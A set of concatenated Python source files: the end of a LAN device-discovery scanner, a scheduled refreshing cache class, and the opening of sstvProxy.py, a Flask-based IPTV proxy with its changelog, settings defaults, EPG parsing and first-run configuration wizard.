        for line in lines:
            mac, vendor = line.split(",", 1)
            vendor_dict[mac] = vendor
        return vendor_dict

    # get the first 6 hex digits of mac address (the OUI / vendor prefix)
    def get_mac_vendor_bytes(self, mac):
        """Return the vendor (OUI) portion of *mac*: the first 6 hex digits
        with '-', ':' and '.' separators removed."""
        mac = mac.replace("-", "") \
            .replace(":", "") \
            .replace(".", "")
        return mac[:6]

    # ---------- JSON methods -----------------
    def update_json(self):
        """Mirror every known device into discovery_history.json."""
        for dev in self.scanned_devices:
            dev_dict = {
                "MAC": dev.mac,
                "IP": format(dev.ip),
                "UP": dev.UP,
                "VENDOR": dev.vendor,
                "ROUTER": dev.router,
                "FSCAN_DATE": format(dev.first_scan_date)
            }
            jhistoric.update_historic('discovery_history.json', dev_dict)

    # ---------- Utility methods --------------
    def print_scanned_devices(self):
        """Print every device found by the most recent scan."""
        print("List devices from last scan:")
        for dev in self.current_scanned_devices:
            dev.print()
            print("-"*30)

    def print_device_history(self):
        """Print every device ever seen since startup."""
        print("List of every scanned device in the network")
        for dev in self.scanned_devices:
            dev.print()
            print("-"*30)
def get_args():
    """Parse command-line options: -p scan period, -n network address,
    -s single-scan flag.  Returns the argparse namespace."""

    def _positive_int(string):
        # argparse type hook: accept only integers >= 1 for the period.
        value = int(string)
        if value < 1:
            raise argparse.ArgumentTypeError("Period must be an integer bigger than zero")
        return value

    parser = argparse.ArgumentParser(description="A periodic scan script.")
    parser.add_argument("-p", dest="period", default=10, required=False,
                        type=_positive_int,  # check if int is positive
                        help="Determines the time between each scan in seconds")
    parser.add_argument("-n", dest="net_addr", required=False,
                        type=ipaddress.ip_network,
                        help="The network ip and subnet mask in the format X.X.X.X/M")
    parser.add_argument("-s", dest="single_scan", action="store_true",
                        help="Perform network scan only once")
    return parser.parse_args()
def main():
    """Entry point: parse the command line and run either one scan or a
    periodic scan loop."""
    print("NETSCAN - network discovery and management tool")
    print("Use -h for options")
    options = get_args()
    scanner = NetworkScanner(options.net_addr)
    if not options.single_scan:
        scanner.periodic_scan(options.period)
    else:
        print("Perfoming scan only once.")
        scanner.single_scan()
if __name__ == "__main__":
main()
|
scheduler_cache.py | import logging
import threading
from copy import deepcopy
from apscheduler.schedulers.blocking import BlockingScheduler
from readerwriterlock import rwlock
from friend_rating_server.util.config import get_config
class SchedulerCache(object):
    """Read-through cache with periodic full refresh.

    *func* computes the value for a key.  A BlockingScheduler job re-runs
    *func* for every cached key each *expire* seconds (default 7200) on a
    dedicated thread; reads and writes are guarded by a fair reader-writer
    lock.  get() returns deep copies so callers cannot mutate cache state.
    """

    def __init__(self, func, expire=7200):
        self.scheduler = BlockingScheduler()
        self.data = dict()  # key -> cached value
        self.func = func    # loader invoked on cache miss and on refresh
        self.lock = rwlock.RWLockFairD()
        # refresh every cached entry periodically via __gao
        self.scheduler.add_job(self.__gao, 'interval', seconds=expire)
        # BlockingScheduler.start() blocks, so run it on its own thread
        threading.Thread(target=self.scheduler.start).start()
        SchedulerCache.objects.append(self)  # register for shutdown_all()

    def get(self, key):
        """Return a deep copy of the value cached for *key*, loading it
        with self.func on a miss and storing the result.

        NOTE(review): the miss path calls self.func while still holding
        the read lock, and concurrent misses may each invoke the loader —
        confirm that is acceptable for the workload.
        """
        update = False
        with self.lock.gen_rlock():
            value = self.data.get(key)
            if value is None:
                logging.info(f'start loading key {key}')
                value = self.func(key)
                logging.info(f'end loading key {key}')
                update = True
        if update:
            with self.lock.gen_wlock():
                # crude size cap: wipe the whole cache once the limit is hit
                if len(self.data) > get_config('scheduler_cache.max_size', 100000):
                    self.data.clear()
                self.data[key] = value
        logging.debug(self.data)
        return deepcopy(value)

    def __gao(self):
        """Background refresh: recompute every cached key into a fresh
        dict, then swap it in under the write lock.

        NOTE(review): iterates self.data without holding the read lock —
        confirm concurrent mutation during refresh is tolerable.
        """
        logging.info("__gao start")
        data = dict()
        for key in self.data.keys():
            data[key] = self.func(key)
            logging.info(data[key])
        with self.lock.gen_wlock():
            self.data = data

    @staticmethod
    def shutdown_all():
        """Stop the scheduler of every SchedulerCache ever created."""
        for obj in SchedulerCache.objects:
            obj.scheduler.shutdown()

    # Class-level registry of all instances; defined after the methods but
    # bound on the class before any __init__ runs, so the append above works.
    objects = []
|
sstvProxy.py | #!/usr/bin/env python3
###
###Copyright (c) 2016 by Joel Kaaberg and contributors. See AUTHORS
###for more details.
###
###Some rights reserved.
###
###Redistribution and use in source and binary forms of the software as well
###as documentation, with or without modification, are permitted provided
###that the following conditions are met:
###
###* Redistributions of source code must retain the above copyright
### notice, this list of conditions and the following disclaimer.
###
###* Redistributions in binary form must reproduce the above
### copyright notice, this list of conditions and the following
### disclaimer in the documentation and/or other materials provided
### with the distribution.
###
###* The names of the contributors may not be used to endorse or
### promote products derived from this software without specific
### prior written permission.
###
###THIS SOFTWARE AND DOCUMENTATION IS PROVIDED BY THE COPYRIGHT HOLDERS AND
###CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT
###NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
###A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
###OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
###EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
###PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
###PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
###LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
###NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
###SOFTWARE AND DOCUMENTATION, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
###DAMAGE.
###
import logging, os, sys, time, argparse, json, gzip, base64, platform, threading, subprocess, urllib, glob, sqlite3, array, socket, struct, ntpath, timeit, re
from datetime import datetime, timedelta
from json import load, dump
from logging.handlers import RotatingFileHandler
from xml.etree import ElementTree as ET
from socket import timeout
from io import StringIO
from xml.sax.saxutils import escape
import urllib.request as requests
import requests as req
import datetime as dt
HEADLESS = False
try:
from urlparse import urljoin
import thread
except ImportError:
from urllib.parse import urljoin
import _thread
from flask import Flask, redirect, abort, request, Response, send_from_directory, jsonify, render_template, \
stream_with_context, url_for
# Command-line options for the proxy itself.
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--debug", action='store_true', help="Console Debugging Enable")
parser.add_argument("-hl", "--headless", action='store_true', help="Force Headless mode")
parser.add_argument("-t", "--tvh", action='store_true', help="Force TVH scanning mode")
parser.add_argument("-i", "--install", action='store_true', help="Force install again")
args = parser.parse_args()

# Headless detection: no usable tkinter, or headless explicitly requested.
try:
    import tkinter
except:
    HEADLESS = True
if args.headless or 'headless' in sys.argv:
    HEADLESS = True

# Flask application serving all proxy endpoints.
app = Flask(__name__, static_url_path='')
__version__ = 1.824
# Changelog
# 1.824 - Backup server prompt added for headless
# 1.823 - Added -i for install trigger
# 1.822 - Added Auto server selection to Gui.
# 1.821 - Added CHECK_CHANNEL to adv settings
# 1.82 - Advanced settings added to web page, channel scanning work
# 1.815 - Restart option fix
# 1.814 - EPG Hotfix
# 1.813 - EPG Hotfix
# 1.812 - FixUrl Fix, re-added EPG override (was inadvertently removed in a commit revert), change of epg refresh to 4hrs
# 1.811 - Dev disable
# 1.81 - Improvement to Series Category detection.
# 1.8 - Added .gz support for EXTRA XML file/url.
# 1.731 - Correction of channel return type that had been removed
# 1.73 - HTML write exception fixed for settings page, Vaders update
# 1.72 - Auto server selection based off of ping
# 1.71 - Channel parsing catch added for missing channels
# 1.7 - Static and dynamic xspf options added ip:port/sstv/static.xspf or ip:port/sstv/playlist.xspf, changed tkinter menu
# 1.691 - Updated FOG Urls
# 1.69 - Added more info to website, removed network discovery(isn't useful).
# 1.68 - Updated for MyStreams changes
# 1.672 - Changed mpegts output default quality from 1 to what user has set.
# 1.671 - Correction of MMATV url
# 1.67 - Finished JSON to XML, fixed quality setting and settings menu form posting
# 1.66 - Added extra m3u8 to the standard Plex Live output, make sure to use combined.xml in this scenario instead too.
# 1.65 - Addition of strmtype 'mpegts' utilises ffmpeg pipe prev used only by TVH/Plex Live. Enhancement of Webpage incl update and restart buttons.
# 1.64 - Bugfixes
# 1.63 - Added catch for clients with no user agent at all
# 1.62 - xmltv merger bugfix and speedup, kodi settings overwrite disabled
# 1.61 - Addition of test.m3u8 to help identify client requirements
# 1.60 - Addition of XMLTV merger /combined.xml, TVH CHNUM addition, Addition of MMA tv auth, change of returns based on detected client
# 1.59 - Removed need for TVH redirect, added a new path IP:PORT/tvh can be used in plex instead!
# 1.58 - A single dynamic channel can be requested with /ch##.m3u8 strm/qual options are still optional is /ch1.m3u8?strm=rtmp&qual=2
# 1.57 - Index.html enhancements
# 1.56 - Addition of TVH proxy core role to this proxy, will disable SSTV to plex live though
# 1.55 - Addition of Static m3u8
# 1.54 - Adjustment to kodi dynamic url links and fix to external hls usage.
# 1.53 - Sports only epg available at /sports.xml
# 1.52 - Addition of External Port
# 1.51 - Inclusion of an m3u8 merger to add another m3u8 files contents to the end of the kodi.m3u8 playlist result is called combined.m3u8 refer advanced settings.
# 1.50 - GUI Redesign
# 1.47 - TVH scanning fixed.
# 1.46 - Removed startup gui from mac and linux exes, fixed linux url
# 1.45 - Added restart required message, Change of piping checks, manual trigger now for easy mux detection (forcing channel 1), use 'python sstvproxy install'
# 1.44 - Change of initial launch to use the gui, if not desired launch with 'python sstvproxy.py headless'. Added adv settings parsing see advancedsettings.json for example
# 1.43 - Bugfix settings menu
# 1.42 - External Playlist added, version check and download added
# 1.41 - Bug fix and switch put on network discovery
# 1.40 - Settings menu added to /index.html
# 1.37 - Network Discovery fixed hopefully
# 1.36 - Two path bug fixes
# 1.35 - Mac addon path fix and check
# 1.34 - Fixed Plex Discovery, TVH file creation fix and addition of writing of genres and template files
# 1.33 - Typo
# 1.32 - Change server name dots to hyphens.
# 1.31 - Tidying
# 1.3 - EPG - Changed zap2it references to the channel number for better readability in clients that use that field as the channel name. As a result the epgs from both sources share the same convention. Playlist generators adjusted to suit.
# 1.2 - TVH Completion and install
# 1.1 - Refactoring and TVH inclusion
# 1.0 - Initial post testing release
############################################################
# Logging
############################################################

# Setup logging: everything at DEBUG goes to the rotating file; the console
# shows DEBUG only when -d/--debug was passed, INFO otherwise.
log_formatter = logging.Formatter(
    '%(asctime)s - %(levelname)-10s - %(name)-10s - %(funcName)-25s- %(message)s')
logger = logging.getLogger('SmoothStreamsProxy v' + str(__version__))
logger.setLevel(logging.DEBUG)
logging.getLogger('werkzeug').setLevel(logging.ERROR)

# Console logging
console_handler = logging.StreamHandler()
if args.debug:
    console_handler.setLevel(logging.DEBUG)
else:
    console_handler.setLevel(logging.INFO)
console_handler.setFormatter(log_formatter)
logger.addHandler(console_handler)

# Rotating log files under ./cache/status.log (2 MB each, 5 backups)
if not os.path.isdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache')):
    os.mkdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache'))
file_handler = RotatingFileHandler(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'status.log'),
                                   maxBytes=1024 * 1024 * 2,
                                   backupCount=5)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(log_formatter)
logger.addHandler(file_handler)

# NOTE: `requests` here is urllib.request (aliased at import time).  All
# urlopen calls share this opener so the YAP user agent is always sent.
opener = requests.build_opener()
opener.addheaders = [('User-agent', 'YAP - %s - %s - %s' % (sys.argv[0], platform.system(), str(__version__)))]
requests.install_opener(opener)
type = ""
latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/sstvProxy.py"
if not sys.argv[0].endswith('.py'):
if platform.system() == 'Linux':
type = "Linux/"
latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/Linux/sstvProxy"
elif platform.system() == 'Windows':
type = "Windows/"
latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/Windows/sstvproxy.exe"
elif platform.system() == 'Darwin':
type = "Macintosh/"
latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/Macintosh/sstvproxy"
url = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/%sversion.txt" % type
try:
latest_ver = float(json.loads(requests.urlopen(url).read().decode('utf-8'))['Version'])
except:
latest_ver = float(0.0)
logger.info("Latest version check failed, check internet.")
token = {
'hash': '',
'expires': ''
}
playlist = ""
class channelinfo:
    """Plain record describing one channel; fields are filled in elsewhere."""
    epg = ""          # EPG identifier for the channel
    description = ""  # human-readable channel description
    channum = 0       # channel number
    channame = ""     # channel display name
class programinfo:
    """One EPG programme entry.

    The title/category/quality/language attributes are properties whose
    setters normalize raw guide data (e.g. inferring a sports category
    from the title, mapping resolutions like "1280x720" to "720p").
    """
    description = ""
    channel = 0
    channelname = ""
    height = 0        # vertical resolution derived from the quality string
    startTime = 0
    endTime = 0
    timeRange = ""
    _title = ""
    _category = ""
    _quality = ""
    _language = ""

    def get_title(self):
        """Display title: raw title plus quality and time range ("none" when unset)."""
        if len(self._title) == 0:
            return ("none " + self.timeRange).strip()
        else:
            return (self._title + " " + self.quality + " " + self.timeRange).replace("  ", " ").strip()

    def set_title(self, title):
        """Store the raw title and, if no category is known yet, infer one
        from well-known league/sport keywords in the title."""
        self._title = title
        if len(self._category) == 0 or self._category == "TVShows":
            if title.startswith("NHL") or "hockey" in title.lower():
                self._category = "Ice Hockey"
            elif title.startswith("UEFA") or title.startswith("EPL") or title.startswith(
                    "Premier League") or title.startswith("La Liga") or title.startswith("Bundesliga") or title.startswith(
                    "Serie A") or "soccer" in title.lower():
                self._category = "World Football"
            elif title.startswith("MLB") or "baseball" in title.lower():
                self._category = "Baseball"
            elif title.startswith("MMA") or title.startswith("UFC") or "boxing" in title.lower():
                self._category = "Boxing + MMA"
            elif title.startswith("NCAAF") or title.startswith("CFB"):
                self._category = "NCAAF"
            elif title.startswith("ATP") or "tennis" in title.lower():
                self._category = "Tennis"
            elif title.startswith("WWE"):
                self._category = "Wrestling"
            elif title.startswith("NFL") or title.startswith("NBA"):
                self._category = title.split(" ")[0].replace(":", "").strip()
            elif 'nba' in title.lower() or 'nbl' in title.lower() or 'ncaam' in title.lower() or 'basketball' in title.lower():
                self._category = "Basketball"
            elif 'nfl' in title.lower() or 'football' in title.lower() or 'american football' in title.lower() or 'ncaaf' in title.lower() or 'cfb' in title.lower():
                self._category = "Football"
            elif 'EPL' in title or 'efl' in title.lower() or 'soccer' in title.lower() or 'ucl' in title.lower() or 'mls' in title.lower() or 'uefa' in title.lower() or 'fifa' in title.lower() or 'fc' in title.lower() or 'la liga' in title.lower() or 'serie a' in title.lower() or 'wcq' in title.lower():
                self._category = "Soccer"
            elif 'rugby' in title.lower() or 'nrl' in title.lower() or 'afl' in title.lower():
                self._category = "Rugby"
            elif 'cricket' in title.lower() or 't20' in title.lower():
                self._category = "Cricket"
            elif 'tennis' in title.lower() or 'squash' in title.lower() or 'atp' in title.lower():
                self._category = "Tennis/Squash"
            elif 'f1' in title.lower() or 'nascar' in title.lower() or 'motogp' in title.lower() or 'racing' in title.lower():
                self._category = "Motor Sport"
            elif 'golf' in title.lower() or 'pga' in title.lower():
                self._category = "Golf"
            elif 'boxing' in title.lower() or 'mma' in title.lower() or 'ufc' in title.lower() or 'wrestling' in title.lower() or 'wwe' in title.lower():
                self._category = "Martial Sports"
            elif 'hockey' in title.lower() or 'nhl' in title.lower() or 'ice hockey' in title.lower():
                self._category = "Ice Hockey"
            elif 'baseball' in title.lower() or 'mlb' in title.lower() or 'beisbol' in title.lower() or 'minor league' in title.lower():
                self._category = "Baseball"
            elif 'news' in title.lower():
                self._category = "News"
        # print(title, ",", self._category)

    title = property(get_title, set_title)

    def get_category(self):
        """Return the stored category, defaulting to "News" when the title
        or description mentions news and no category was inferred."""
        # Bug fix: the original tested `(a.find("news") or b.find("news")) > -1`,
        # but str.find returns -1 (truthy) on a miss, so a title without
        # "news" short-circuited the `or` to -1 and the description was
        # never consulted.  Compare each result against -1 explicitly.
        if (len(self._category) == 0 or self._category == "none") and (
                self.title.lower().find("news") > -1 or self.description.lower().find("news") > -1):
            return "News"
        else:
            return self._category

    def set_category(self, category):
        # "tv" is the guide's generic placeholder; treat it as "no category".
        if category == "tv":
            self._category = ""
        else:
            self._category = category

    category = property(get_category, set_category)

    def get_language(self):
        return self._language

    def set_language(self, language):
        # US/EN is the default and is displayed as blank.
        if language.upper() == "US" or language.upper() == "EN":
            self._language = ""
        else:
            self._language = language.upper()

    language = property(get_language, set_language)

    def get_quality(self):
        return self._quality

    def set_quality(self, quality):
        """Normalize a resolution string ("1920x1080", "720p", "hqlq", ...)
        into a label and set self.height accordingly."""
        if quality.endswith("x1080"):
            self._quality = "1080i"
            self.height = 1080
        elif quality.endswith("x720") or quality.lower() == "720p":
            self._quality = "720p"
            self.height = 720
        elif quality.endswith("x540") or quality.lower() == "hqlq":
            self._quality = "540p"
            self.height = 540
        elif quality.find("x") > 2:
            # Any other WxH string: keep it verbatim, extract the height.
            self._quality = quality
            self.height = int(quality.split("x")[1])
        else:
            self._quality = quality
            self.height = 0

    quality = property(get_quality, set_quality)

    def get_album(self):
        """Category + quality + language, used as the grouping label."""
        if self._quality.upper() == "HQLQ" and self.channelname.upper().find(" 720P") > -1:
            self._quality = "720p"
        return (self._category + " " + self.quality + " " + self._language).strip().replace("  ", " ")

    album = property(get_album)
class EST5EDT(dt.tzinfo):
    """US Eastern time zone with hand-rolled DST rules (UTC-5 / UTC-4)."""

    def utcoffset(self, dt):
        # Base offset is UTC-5; add one hour while DST is in effect.
        return timedelta(hours=-5) + self.dst(dt)

    def utc_seconds(self):
        """Current UTC offset of this zone, in seconds."""
        return self.utcoffset(datetime.now()).total_seconds()

    def dst(self, dt):
        # DST runs from the 2nd Sunday of March through the 1st Sunday of
        # November: the first Sunday on/after Mar 8, resp. on/after Nov 1.
        march_anchor = datetime(dt.year, 3, 8)
        self.dston = march_anchor + timedelta(days=6 - march_anchor.weekday())
        nov_anchor = datetime(dt.year, 11, 1)
        self.dstoff = nov_anchor + timedelta(days=6 - nov_anchor.weekday())
        in_dst = self.dston <= dt.replace(tzinfo=None) < self.dstoff
        return timedelta(hours=1) if in_dst else timedelta(0)

    def tzname(self, dt):
        return 'EST5EDT'
############################################################
# CONFIG
############################################################
# These are just defaults, place your settings in a file called proxysettings.json in the same directory
USER = ""
PASS = ""
SITE = "viewstvn"
SRVR = "dnaw1"
SRVR_SPARE = "dnaw1"
AUTO_SERVER = False
CHECK_CHANNEL = True
STRM = "hls"
QUAL = "1"
QUALLIMIT = 70
LISTEN_IP = "127.0.0.1"
LISTEN_PORT = 6969
SERVER_HOST = "http://" + LISTEN_IP + ":" + str(LISTEN_PORT)
SERVER_PATH = "sstv"
KODIPORT = 8080
EXTIP = "127.0.0.1"
EXTPORT = 80
EXT_HOST = "http://" + EXTIP + ":" + str(EXTPORT)
KODIUSER = "kodi"
KODIPASS = ""
EXTM3URL = ''
EXTM3UNAME = ''
EXTM3UFILE = ''
EXTXMLURL = ''
TVHREDIRECT = False
TVHURL = '127.0.0.1'
TVHUSER = ''
TVHPASS = ''
OVRXML = ''
tvhWeight = 300 # subscription priority
tvhstreamProfile = 'pass' # specifiy a stream profile that you want to use for adhoc transcoding in tvh, e.g. mp4
GUIDELOOKAHEAD = 5 #minutes
# LINUX/WINDOWS/MAC: per-platform ffmpeg binary location and, when Kodi's
# IPTV Simple addon data directory exists, the path to write playlists into
# (ADDONPATH is False when the addon is not installed).
if platform.system() == 'Linux':
    FFMPEGLOC = '/usr/bin/ffmpeg'
    if os.path.isdir(os.path.join(os.path.expanduser("~"), '.kodi', 'userdata', 'addon_data', 'pvr.iptvsimple')):
        ADDONPATH = os.path.join(os.path.expanduser("~"), '.kodi', 'userdata', 'addon_data', 'pvr.iptvsimple')
    else:
        ADDONPATH = False
elif platform.system() == 'Windows':
    FFMPEGLOC = os.path.join('C:\FFMPEG', 'bin', 'ffmpeg.exe')
    if os.path.isdir(os.path.join(os.path.expanduser("~"), 'AppData', 'Roaming', 'Kodi', 'userdata', 'addon_data',
                                  'pvr.iptvsimple')):
        ADDONPATH = os.path.join(os.path.expanduser("~"), 'AppData', 'Roaming', 'Kodi', 'userdata', 'addon_data',
                                 'pvr.iptvsimple')
    else:
        ADDONPATH = False
elif platform.system() == 'Darwin':
    FFMPEGLOC = '/usr/local/bin/ffmpeg'
    if os.path.isdir(
            os.path.join(os.path.expanduser("~"), "Library", "Application Support", 'Kodi', 'userdata', 'addon_data',
                         'pvr.iptvsimple')):
        ADDONPATH = os.path.join(os.path.expanduser("~"), "Library", "Application Support", 'Kodi', 'userdata',
                                 'addon_data', 'pvr.iptvsimple')
    else:
        ADDONPATH = False
else:
    print("Unknown OS detected... proxy may not function correctly")
############################################################
# INIT
############################################################
# [display name, server code] pairs offered in the server-selection menus.
serverList = [
    [' EU-Mix', 'deu'],
    [' DE-Frankfurt', 'deu-de'],
    [' NL-Mix', 'deu-nl'],
    [' NL-1', 'deu-nl1'],
    [' NL-2', 'deu-nl2'],
    [' NL-3 Ams', 'deu-nl3'],
    [' NL-4 Breda', 'deu-nl4'],
    [' NL-5 Enschede', 'deu-nl5'],
    [' UK-Mix', 'deu-uk'],
    [' UK-London1', 'deu-uk1'],
    [' UK-London2', 'deu-uk2'],
    [' US-Mix', 'dna'],
    [' East-Mix', 'dnae'],
    [' West-Mix', 'dnaw'],
    [' East-NJ', 'dnae1'],
    [' East-VA', 'dnae2'],
    # [' East-Mtl', 'dnae3'],
    # [' East-Tor', 'dnae4'],
    [' East-NY', 'dnae6'],
    [' West-Phx', 'dnaw1'],
    [' West-LA', 'dnaw2'],
    [' West-SJ', 'dnaw3'],
    [' West-Chi', 'dnaw4'],
    ['Asia', 'dap'],
    ['Asia-Old', 'dsg']
]
# Maps SmoothStreams channel numbers to Vaders (MyStreams) stream ids.
vaders_channels = {"1":"2499","2":"2500","3":"2501","4":"2502","5":"2503","6":"2504","7":"2505","8":"2506","9":"2507","10":"2508","11":"2509","12":"2510","13":"2511","14":"2512","15":"2513","16":"2514","17":"2515","18":"2516","19":"2517","20":"2518","21":"2519","22":"2520","23":"2521","24":"2522","25":"2523","26":"2524","27":"2525","28":"2526","29":"2527","30":"2528","31":"2529","32":"2530","33":"2531","34":"2532","35":"2533","36":"2534","37":"2535","38":"2536","39":"2537","40":"2538","41":"2541","42":"2542","43":"2543","44":"2544","45":"2545","46":"2546","47":"2547","48":"2548","49":"2549","50":"2550","51":"2551","52":"2552","53":"2553","54":"2554","55":"2555","56":"2556","57":"2557","58":"2606","59":"2607","60":"2608","61":"2609","62":"2610","63":"2611","64":"2612","65":"2613","66":"2614","67":"2615","68":"2616","69":"2617","70":"2618","71":"2619","72":"2620","73":"2622","74":"2621","75":"2623","76":"2624","77":"2625","78":"2626","79":"2627","80":"2628","81":"2629","82":"2630","83":"2631","84":"2632","85":"2633","86":"2634","87":"2635","88":"2636","89":"2637","90":"2638","91":"2639","92":"2640","93":"2641","94":"2642","95":"2643","96":"2644","97":"2645","98":"2646","99":"2647","100":"2648","101":"2649","102":"2650","103":"2651","104":"2652","105":"2653","106":"2654","107":"2655","108":"2656","109":"2657","110":"2658","111":"2659","112":"2660","113":"2661","114":"2662","115":"2663","116":"2664","117":"2665","118":"2666","119":"2667","120":"2668","121":"47381","122":"2679","123":"2680","124":"2681","125":"2682","126":"47376","127":"47377","128":"47378","129":"47379","130":"47380","131":"47718","132":"47719","133":"49217","134":"50314","135":"50315","136":"50319","137":"50320","138":"50321","139":"50322","141":"49215","140":"50394","142":"49216","143":"50395","144":"50396","145":"50397","146":"50398","147":"50399","148":"47707","149":"47670","150":"47716"}
# [display name, provider code] pairs; the code is used as SITE.
providerList = [
    ['Live247', 'view247'],
    ['Mystreams', 'vaders'],
    ['StarStreams', 'viewss'],
    ['StreamTVnow', 'viewstvn'],
    ['MMA-TV/MyShout', 'viewmmasr']
]
# Supported stream transport types (value of STRM).
streamtype = ['hls', 'rtmp', 'mpegts']
# [display name, quality code] pairs; the code is used as QUAL.
qualityList = [
    ['HD', '1'],
    ['HQ', '2'],
    ['LQ', '3']
]
def adv_settings():
    """Apply optional overrides from an advancedsettings.json sitting
    next to the script.

    Each recognised key, when present, replaces the corresponding
    module-level global. Missing file means no-op. "checkchannel" is
    special-cased: it is stored as a boolean (string compare to "True").
    """
    path = os.path.join(os.path.dirname(sys.argv[0]), 'advancedsettings.json')
    if not os.path.isfile(path):
        return
    logger.debug("Parsing advanced settings")
    with open(path) as advset:
        advconfig = load(advset)
    # (json key, global name, debug message) in the original check order
    overrides = [
        ("kodiuser", "KODIUSER", "Overriding kodi username"),
        ("kodipass", "KODIPASS", "Overriding kodi password"),
        ("ffmpegloc", "FFMPEGLOC", "Overriding ffmpeg location"),
        ("kodiport", "KODIPORT", "Overriding kodi port"),
        ("extram3u8url", "EXTM3URL", "Overriding EXTM3URL"),
        ("extram3u8name", "EXTM3UNAME", "Overriding EXTM3UNAME"),
        ("extram3u8file", "EXTM3UFILE", "Overriding EXTM3UFILE"),
        ("extraxmlurl", "EXTXMLURL", "Overriding EXTXMLURL"),
        ("tvhredirect", "TVHREDIRECT", "Overriding tvhredirect"),
        ("tvhaddress", "TVHURL", "Overriding tvhaddress"),
        ("tvhuser", "TVHUSER", "Overriding tvhuser"),
        ("tvhpass", "TVHPASS", "Overriding tvhpass"),
        ("overridexml", "OVRXML", "Overriding XML"),
    ]
    for key, global_name, message in overrides:
        if key in advconfig:
            logger.debug(message)
            # assignment via globals() is equivalent to `global NAME; NAME = ...`
            globals()[global_name] = advconfig[key]
    if "checkchannel" in advconfig:
        logger.debug("Overriding CheckChannel")
        globals()["CHECK_CHANNEL"] = advconfig["checkchannel"] == "True"
def load_settings():
    """Load proxysettings.json into the module-level configuration
    globals; on any failure fall back to first-run setup (interactive
    console wizard when HEADLESS, otherwise the Tk GUI), persist the
    answers, and run installer(). Advanced overrides are applied last.
    """
    global QUAL, QUALLIMIT, USER, PASS, SRVR,SRVR_SPARE, SITE, STRM, KODIPORT, LISTEN_IP, LISTEN_PORT, SERVER_HOST, EXTIP, EXT_HOST, EXTPORT
    if not os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')):
        # NOTE(review): only logs -- control still enters the try below,
        # where open() raises and drops into the setup path in except.
        logger.debug("No config file found.")
    try:
        logger.debug("Parsing settings")
        with open(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')) as jsonConfig:
            config = {}
            config = load(jsonConfig)
            if "quality" in config:
                QUAL = config["quality"]
            if "username" in config:
                USER = config["username"]
            if "password" in config:
                PASS = config["password"]
            if "server" in config:
                SRVR = config["server"]
            if "server_spare" in config:
                SRVR_SPARE = config["server_spare"]
            if "service" in config:
                SITE = config["service"]
                # legacy service name kept for old config files
                if SITE == "mmatv":
                    SITE = "viewmmasr"
            if "stream" in config:
                STRM = config["stream"]
            if "kodiport" in config:
                KODIPORT = config["kodiport"]
            if "externalip" in config:
                EXTIP = config["externalip"]
            if "externalport" in config:
                EXTPORT = config["externalport"]
            if "ip" in config and "port" in config:
                LISTEN_IP = config["ip"]
                LISTEN_PORT = config["port"]
                SERVER_HOST = "http://" + LISTEN_IP + ":" + str(LISTEN_PORT)
            # assumes module-level defaults for EXTIP/EXTPORT exist when
            # the config omits them -- TODO confirm defaults upstream
            EXT_HOST = "http://" + EXTIP + ":" + str(EXTPORT)
            logger.debug("Using config file.")
    except:
        # any read/parse failure means first-run setup
        if HEADLESS:
            # console wizard: prompt for every setting in turn
            config = {}
            config["username"] = input("Username?")
            USER = config["username"]
            config["password"] = input("Password?")
            PASS = config["password"]
            os.system('cls' if os.name == 'nt' else 'clear')
            print("Type the number of the item you wish to select:")
            for i in providerList:
                print(providerList.index(i), providerList[providerList.index(i)][0])
            config["service"] = providerList[int(input("Provider name?"))][1]
            os.system('cls' if os.name == 'nt' else 'clear')
            SITE = config["service"]
            print("Type the number of the item you wish to select:")
            for i in serverList:
                print(serverList.index(i), serverList[serverList.index(i)][0])
            result = input("Regional Server name? (or type 'auto')")
            if result.lower() == 'auto':
                # measure response times and pick primary + backup servers
                testServers()
                config["server"] = SRVR
                config["server_spare"] = SRVR_SPARE
            else:
                config["server"] = serverList[int(result)][1]
                os.system('cls' if os.name == 'nt' else 'clear')
                for i in serverList:
                    print(serverList.index(i), serverList[serverList.index(i)][0])
                result = input("Backup Regional Server name?")
                config["server_spare"] = serverList[int(result)][1]
            os.system('cls' if os.name == 'nt' else 'clear')
            print("Type the number of the item you wish to select:")
            for i in streamtype:
                print(streamtype.index(i), i)
            config["stream"] = streamtype[int(input("Dynamic Stream Type? (HLS/RTMP)"))]
            os.system('cls' if os.name == 'nt' else 'clear')
            for i in qualityList:
                print(qualityList.index(i), qualityList[qualityList.index(i)][0])
            config["quality"] = qualityList[int(input("Stream quality?"))][1]
            os.system('cls' if os.name == 'nt' else 'clear')
            config["ip"] = input("Listening IP address?(ie recommend 127.0.0.1 for beginners)")
            config["port"] = int(input("and port?(ie 99, do not use 8080)"))
            os.system('cls' if os.name == 'nt' else 'clear')
            config["externalip"] = input("External IP?")
            config["externalport"] = int(input("and ext port?(ie 99, do not use 8080)"))
            os.system('cls' if os.name == 'nt' else 'clear')
            # mirror the collected answers into the globals
            QUAL = config["quality"]
            SRVR = config["server"]
            STRM = config["stream"]
            LISTEN_IP = config["ip"]
            LISTEN_PORT = config["port"]
            EXTIP = config["externalip"]
